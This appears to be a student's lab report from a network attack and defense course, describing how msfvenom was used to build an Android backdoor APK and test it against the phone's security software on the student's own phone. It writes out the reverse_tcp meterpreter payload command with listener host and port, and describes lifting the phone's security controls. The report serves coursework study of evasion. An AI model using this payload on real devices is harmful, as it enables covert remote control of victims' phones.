实验内容

  • msfvenom 生成Android平台的apk后门文件

实验环境

华为手机管家(内置Tencent、360、MODILE SECUNITY), Android程序安全补丁2020年1月1日

实验步骤

  • 将虚拟机的网络模式改为桥接模式
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件

  • 实现手机、虚拟机互ping
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件

  • msfvenom -l payloads 找到相应的 payload
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=5234 R > 20175234test.apk
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件

  • msfconsole启动监听

  • 把后门程序移到手机里头

  • 安装apk报错,运行报错
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件

  • 解除管控,继续运行
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件

可以运行但是很快就又死了,最初以为是手机杀后台,尝试wakelock但是没有用,应该是杀软检测到了连接

  • 网站测试
    2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件

END

相关文章:

  • 2022-02-14
  • 2021-12-16
  • 2022-03-05
  • 2022-03-08
  • 2022-03-10
  • 2022-01-07
  • 2021-12-05
  • 2021-12-05
猜你喜欢
  • 2021-12-05
  • 2022-02-04
  • 2022-01-05
  • 2021-07-04
  • 2021-10-28
  • 2021-08-28
  • 2022-02-22
相关资源
相似解决方案